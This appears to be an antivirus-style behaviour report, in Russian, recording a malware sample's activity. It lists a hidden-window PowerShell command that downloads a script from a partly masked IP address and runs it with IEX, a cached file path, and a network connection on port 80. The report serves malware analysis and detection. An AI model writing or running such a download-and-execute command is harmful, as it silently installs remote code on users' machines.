Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -nop -w hidden -c $E=new-object net.webclient;$E.proxy=[Net.WebRequest]::GetSystemWebProxy();$E.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $E.downloadstring('http://5.###.9...
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\dyps348i\config14[1].txt
- '5.###.93.169':80
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -nop -w hidden -c $E=new-object net.webclient;$E.proxy=[Net.WebRequest]::GetSystemWebProxy();$E.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $E.downloadstring('http://5.###.9... (со скрытым окном)